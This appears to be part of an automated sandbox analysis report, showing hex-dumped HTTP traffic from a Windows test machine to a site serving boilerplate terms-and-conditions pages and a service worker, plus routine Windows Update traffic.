                                                          2023-11-27 03:24:32 UTC1369INData Raw: 20 69 73 20 61 70 70 72 6f 70 72 69 61 74 65 20 69 6e 20 74 68 65 20 63 6f 6e 74 65 78 74 20 6f 66 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 6f 72 64 73 2e 20 4c 69 6b 65 77 69 73 65 2c 20 74 68 65 20 77 6f 72 64 73 20 22 79 6f 75 22 20 61 6e 64 20 22 79 6f 75 72 22 0a 09 72 65 66 65 72 20 74 6f 20 79 6f 75 2c 20 74 68 65 20 70 65 72 73 6f 6e 20 77 68 6f 20 69 73 20 62 65 69 6e 67 20 70 72 65 73 65 6e 74 65 64 20 77 69 74 68 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 66 6f 72 20 79 6f 75 72 20 61 67 72 65 65 6d 65 6e 74 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 41 63 63 65 73 73 69 6e 67 20 74 68 65 20 53 69 74 65 2c 20 69 6e 20 61 6e 79 20 6d 61 6e 6e 65 72 2c 20 77 68 65 74 68 65 72 20 61 75 74 6f 6d 61 74 65 64 20 6f
                                                          Data Ascii: is appropriate in the context of the use of the words. Likewise, the words "you" and "your"refer to you, the person who is being presented with this document for your agreement.</p><p dir="ltr">Accessing the Site, in any manner, whether automated o
                                                          2023-11-27 03:24:32 UTC1369INData Raw: 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 0a 09 6f 66 20 74 68 69 72 74 65 65 6e 2c 20 61 6e 64 20 70 72 6f 76 69 64 65 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 72 69 67 68 74 73 20 75 6e 64 65 72 20 66 65 64 65 72 61 6c 20 6c 61 77 20 77 69 74 68 20 72 65 73 70 65 63 74 20 74 6f 20 73 75 63 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 75 6c 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 54 68 69 73 20 53 69 74 65 20 69 73 20 6e 6f 74 20 64 69 72 65 63 74 65 64 20 74 6f 20 63 68
                                                          Data Ascii: personal information from children under the ageof thirteen, and provides important information regarding their rights under federal law with respect to such information.</p><br><ul><li dir="ltr"><p dir="ltr">This Site is not directed to ch
                                                          2023-11-27 03:24:32 UTC1369INData Raw: 72 77 69 73 65 20 64 69 73 74 72 69 62 75 74 65 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 09 09 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 0a 09 09 3c 2f 70 3e 0a 09 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 42 65 63 61 75 73 65 20 77 65 20 64 6f 20 6e 6f 74 20 63 6f 6c 6c 65 63 74 20 61 6e 79 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 20 6f 66 20 74 68 69 72 74 65 65 6e 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 53 69 74
                                                          Data Ascii: rwise distribute personally identifiable contact informationthrough the Site.</p></li><li dir="ltr"><p dir="ltr">Because we do not collect any personally identifiable information from children under the age of thirteen as part of the Sit
                                                          2023-11-27 03:24:32 UTC1369INData Raw: 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 2c 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 2c 20 70 72 6f 76 69 64 65 64 20 74 68 61 74 20 79 6f 75 20 6b 65 65 70 20 69 6e 74 61 63 74 20 61 6c 6c 20 63 6f 70 79 72 69 67 68 74 20 61 6e 64 20 6f 74 68 65 72 20 70 72 6f 70 72 69 65 74 61 72 79 20 6e 6f 74 69 63 65 73 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 68 65 20 74 72 61 64 65 20 6e 61 6d 65 73 20 61 6e 64 20 74 72 61 64 65 6d 61 72 6b 73 20 6f 66 20 74 68 65 20 70 65 72 73 6f 6e 73 20 6f 72 20 65 6e 74 69 74 69 65 73 20 72 65 66 65 72 72 65 64 20 74 6f 20 69 6e 20 6f 75 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 20 61 72 65 20 6f 77 6e 65 64 20 62 79 20 74 68 6f 73 65 20 65 6e 74 69 74 69 65 73 2c 20 61 6e 64 20
                                                          Data Ascii: your personal, non-commercial use, provided that you keep intact all copyright and other proprietary notices.</p><p dir="ltr">The trade names and trademarks of the persons or entities referred to in our advertisements are owned by those entities, and
                                                          2023-11-27 03:24:32 UTC1369INData Raw: 0a 09 75 70 6c 6f 61 64 69 6e 67 20 75 73 65 72 2c 20 6f 72 20 61 20 63 6f 70 79 72 69 67 68 74 20 63 6f 6d 70 6c 61 69 6e 74 20 62 79 20 74 68 65 20 72 69 67 68 74 66 75 6c 20 6f 77 6e 65 72 2e 20 54 68 65 72 65 66 6f 72 65 2c 20 62 79 20 75 70 6c 6f 61 64 69 6e 67 20 61 6e 79 20 63 6f 6e 74 65 6e 74 20 74 6f 20 6f 75 72 20 73 69 74 65 2c 20 79 6f 75 20 61 67 72 65 65 20 74 68 61 74 20 79 6f 75 20 67 72 61 6e 74 20 75 73 20 61 20 75 6e 69 76 65 72 73 61 6c 2c 0a 09 70 65 72 70 65 74 75 61 6c 2c 20 73 75 62 6c 69 63 65 6e 73 61 62 6c 65 2c 20 63 6f 6d 6d 65 72 63 69 61 6c 20 61 6e 64 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 2c 20 69 72 72 65 76 6f 63 61 62 6c 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 20 73 75 63 68 20 63 6f 6e 74 65 6e 74 2c 20
                                                          Data Ascii: uploading user, or a copyright complaint by the rightful owner. Therefore, by uploading any content to our site, you agree that you grant us a universal,perpetual, sublicensable, commercial and non-commercial, irrevocable license to use such content,
                                                          2023-11-27 03:24:32 UTC1369INData Raw: 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 57 65 20 6d 61 79 20 61 6c 73 6f 20 63 6f 6c 6c 65 63 74 20 61 6e 64 20 73 74 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 61 73 20 79 6f 75 20 6e 61 76 69 67 61 74 65 20 6f 6e 6c 69 6e 65 20 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 77 65 20 6d 61 79 20 63 6f 6c 6c 65 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 61 62 6f 75 74 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 27 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 74 68 65 20 49 6e 74 65 72 6e 65 74 2c 20 77 68 69 63 68 20 61 6c 6c 6f 77 73 20 75 73 2c 20 61 6d 6f 6e 67 20 6f 74 68 65 72 20 74 68
                                                          Data Ascii: p><p dir="ltr">We may also collect and store information that is generated automatically as you navigate online through the Site. For example, we may collect informationabout your computer's connection to the Internet, which allows us, among other th
                                                          2023-11-27 03:24:32 UTC1369INData Raw: 65 72 73 20 61 6e 64 20 63 6f 6e 74 72 61 63 74 6f 72 73 20 66 6f 72 20 61 20 76 61 72 69 65 74 79 20 6f 66 0a 09 70 75 72 70 6f 73 65 73 2e 20 55 6e 6c 65 73 73 20 79 6f 75 20 69 6e 66 6f 72 6d 20 75 73 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 70 72 6f 63 65 73 73 20 64 65 73 63 72 69 62 65 64 20 62 65 6c 6f 77 2c 20 77 65 20 72 65 73 65 72 76 65 20 74 68 65 20 72 69 67 68 74 20 74 6f 20 75 73 65 2c 20 61 6e 64 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 6f 20 74 68 69 72 64 20 70 61 72 74 69 65 73 2c 20 61 6c 6c 20 6f 66 20 74 68 65 0a 09 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 6f 6c 6c 65 63 74 65 64 20 66 72 6f 6d 20 61 6e 64 20 61 62 6f 75 74 20 79 6f 75 20 77 68 69 6c 65 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 74 68
                                                          Data Ascii: ers and contractors for a variety ofpurposes. Unless you inform us in accordance with the process described below, we reserve the right to use, and to disclose to third parties, all of theinformation collected from and about you while you are using th
                                                          2023-11-27 03:24:32 UTC1369INData Raw: 74 68 65 79 20 63 6f 6c 6c 65 63 74 20 74 6f 20 68 65 6c 70 20 70 72 65 73 65 6e 74 20 74 68 65 69 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 2c 20 74 6f 0a 09 68 65 6c 70 20 6d 65 61 73 75 72 65 20 61 6e 64 20 72 65 73 65 61 72 63 68 20 74 68 65 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 27 20 65 66 66 65 63 74 69 76 65 6e 65 73 73 2c 20 6f 72 20 66 6f 72 20 6f 74 68 65 72 20 70 75 72 70 6f 73 65 73 2e 20 54 68 65 20 75 73 65 20 61 6e 64 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 6f 66 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 74 68 65 73 65 20 74 68 69 72 64 2d 70 61 72 74 79 0a 09 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 61 64 20 73 65 72 76 65 72 73 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 74 68 65 20 72 65 6c 65 76
                                                          Data Ascii: they collect to help present their advertisements, tohelp measure and research the advertisements' effectiveness, or for other purposes. The use and collection of your information by these third-partyadvertisers and ad servers is governed by the relev


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.549779104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:34 UTC733OUTGET /service_worker.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          Accept: */*
                                                          Service-Worker: script
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: same-origin
                                                          Sec-Fetch-Dest: serviceworker
                                                          Referer: https://sofa.thriveuniversehq.com/service_worker.js
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          If-None-Match: W/"56-6089030eb3a5a-gzip"
                                                          If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
                                                          2023-11-27 03:24:34 UTC669INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 34 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 36 2d 36 30 38 39 30 33 30 65 62 33 61 35 61 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 35 30 32 0d 0a 52 65 70 6f 72 74 2d 54 6f
                                                          Data Ascii: HTTP/1.1 304 Not ModifiedDate: Mon, 27 Nov 2023 03:24:34 GMTConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:49 GMTETag: "56-6089030eb3a5a-gzip"Vary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: HITAge: 4502Report-To


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          54192.168.2.54978120.12.23.50443
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:36 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T4Ff3c4fF5lNSMx&MD=h18rKTBt HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2023-11-27 03:24:36 UTC560INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 30 30 30 31 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 4d 78 31 52 6f 4a 48 2f 71 45 77 70 57 66 4b 6c 6c 78 37 73 62 73 6c 32 38 41 75 45 52 7a 35 49 59 64 63 73 76 74 54 4a 63 67 4d 3d 5f 32 31 36 30 22 0d 0a 4d 53 2d 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 20 31 33 32 31 62 61 33 33 2d 35 65 65 30 2d 34 63 63 62 2d
                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: no-cachePragma: no-cacheContent-Type: application/octet-streamExpires: -1Last-Modified: Mon, 01 Jan 0001 00:00:00 GMTETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"MS-CorrelationId: 1321ba33-5ee0-4ccb-
                                                          2023-11-27 03:24:36 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                          Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                          2023-11-27 03:24:36 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                          Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          55192.168.2.549784104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:42 UTC807OUTGET /s3/terms/terms.php HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:24:42 UTC607INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:24:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/
                                                          2023-11-27 03:24:42 UTC762INData Raw: 36 65 36 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 61 72 63 68 69 76 65 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 20 6f 66 20 55 73 65 20 61
                                                          Data Ascii: 6e6e<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="robots" content="noindex,nofollow,noarchive"></head><body><p dir="ltr">sofa.thriveuniversehq.com</p><p dir="ltr">Terms and Conditions of Use a
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 2c 20 61 73 20 69 73 20 61 70 70 72 6f 70 72 69 61 74 65 20 69 6e 20 74 68 65 20 63 6f 6e 74 65 78 74 20 6f 66 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 6f 72 64 73 2e 20 4c 69 6b 65 77 69 73 65 2c 20 74 68 65 20 77 6f 72 64 73 20 22 79 6f 75 22 20 61 6e 64 20 22 79 6f 75 72 22 0a 09 72 65 66 65 72 20 74 6f 20 79 6f 75 2c 20 74 68 65 20 70 65 72 73 6f 6e 20 77 68 6f 20 69 73 20 62 65 69 6e 67 20 70 72 65 73 65 6e 74 65 64 20 77 69 74 68 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 66 6f 72 20 79 6f 75 72 20 61 67 72 65 65 6d 65 6e 74 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 41 63 63 65 73 73 69 6e 67 20 74 68 65 20 53 69 74 65 2c 20 69 6e 20 61 6e 79 20 6d 61 6e 6e 65 72 2c 20 77 68 65 74 68 65 72 20 61 75 74 6f 6d 61 74
                                                          Data Ascii: , as is appropriate in the context of the use of the words. Likewise, the words "you" and "your"refer to you, the person who is being presented with this document for your agreement.</p><p dir="ltr">Accessing the Site, in any manner, whether automat
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 65 20 6f 66 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 0a 09 6f 66 20 74 68 69 72 74 65 65 6e 2c 20 61 6e 64 20 70 72 6f 76 69 64 65 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 72 69 67 68 74 73 20 75 6e 64 65 72 20 66 65 64 65 72 61 6c 20 6c 61 77 20 77 69 74 68 20 72 65 73 70 65 63 74 20 74 6f 20 73 75 63 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 75 6c 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 54 68 69 73 20 53 69 74 65 20 69 73 20 6e 6f 74 20 64 69 72 65 63 74 65 64 20 74
                                                          Data Ascii: e of personal information from children under the ageof thirteen, and provides important information regarding their rights under federal law with respect to such information.</p><br><ul><li dir="ltr"><p dir="ltr">This Site is not directed t
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 6f 74 68 65 72 77 69 73 65 20 64 69 73 74 72 69 62 75 74 65 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 09 09 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 0a 09 09 3c 2f 70 3e 0a 09 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 42 65 63 61 75 73 65 20 77 65 20 64 6f 20 6e 6f 74 20 63 6f 6c 6c 65 63 74 20 61 6e 79 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 20 6f 66 20 74 68 69 72 74 65 65 6e 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65
                                                          Data Ascii: otherwise distribute personally identifiable contact informationthrough the Site.</p></li><li dir="ltr"><p dir="ltr">Because we do not collect any personally identifiable information from children under the age of thirteen as part of the
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 66 6f 72 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 2c 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 2c 20 70 72 6f 76 69 64 65 64 20 74 68 61 74 20 79 6f 75 20 6b 65 65 70 20 69 6e 74 61 63 74 20 61 6c 6c 20 63 6f 70 79 72 69 67 68 74 20 61 6e 64 20 6f 74 68 65 72 20 70 72 6f 70 72 69 65 74 61 72 79 20 6e 6f 74 69 63 65 73 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 68 65 20 74 72 61 64 65 20 6e 61 6d 65 73 20 61 6e 64 20 74 72 61 64 65 6d 61 72 6b 73 20 6f 66 20 74 68 65 20 70 65 72 73 6f 6e 73 20 6f 72 20 65 6e 74 69 74 69 65 73 20 72 65 66 65 72 72 65 64 20 74 6f 20 69 6e 20 6f 75 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 20 61 72 65 20 6f 77 6e 65 64 20 62 79 20 74 68 6f 73 65 20 65 6e 74 69 74 69 65 73 2c 20
                                                          Data Ascii: for your personal, non-commercial use, provided that you keep intact all copyright and other proprietary notices.</p><p dir="ltr">The trade names and trademarks of the persons or entities referred to in our advertisements are owned by those entities,
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 20 74 68 65 0a 09 75 70 6c 6f 61 64 69 6e 67 20 75 73 65 72 2c 20 6f 72 20 61 20 63 6f 70 79 72 69 67 68 74 20 63 6f 6d 70 6c 61 69 6e 74 20 62 79 20 74 68 65 20 72 69 67 68 74 66 75 6c 20 6f 77 6e 65 72 2e 20 54 68 65 72 65 66 6f 72 65 2c 20 62 79 20 75 70 6c 6f 61 64 69 6e 67 20 61 6e 79 20 63 6f 6e 74 65 6e 74 20 74 6f 20 6f 75 72 20 73 69 74 65 2c 20 79 6f 75 20 61 67 72 65 65 20 74 68 61 74 20 79 6f 75 20 67 72 61 6e 74 20 75 73 20 61 20 75 6e 69 76 65 72 73 61 6c 2c 0a 09 70 65 72 70 65 74 75 61 6c 2c 20 73 75 62 6c 69 63 65 6e 73 61 62 6c 65 2c 20 63 6f 6d 6d 65 72 63 69 61 6c 20 61 6e 64 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 2c 20 69 72 72 65 76 6f 63 61 62 6c 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 20 73 75 63 68 20 63 6f 6e 74 65
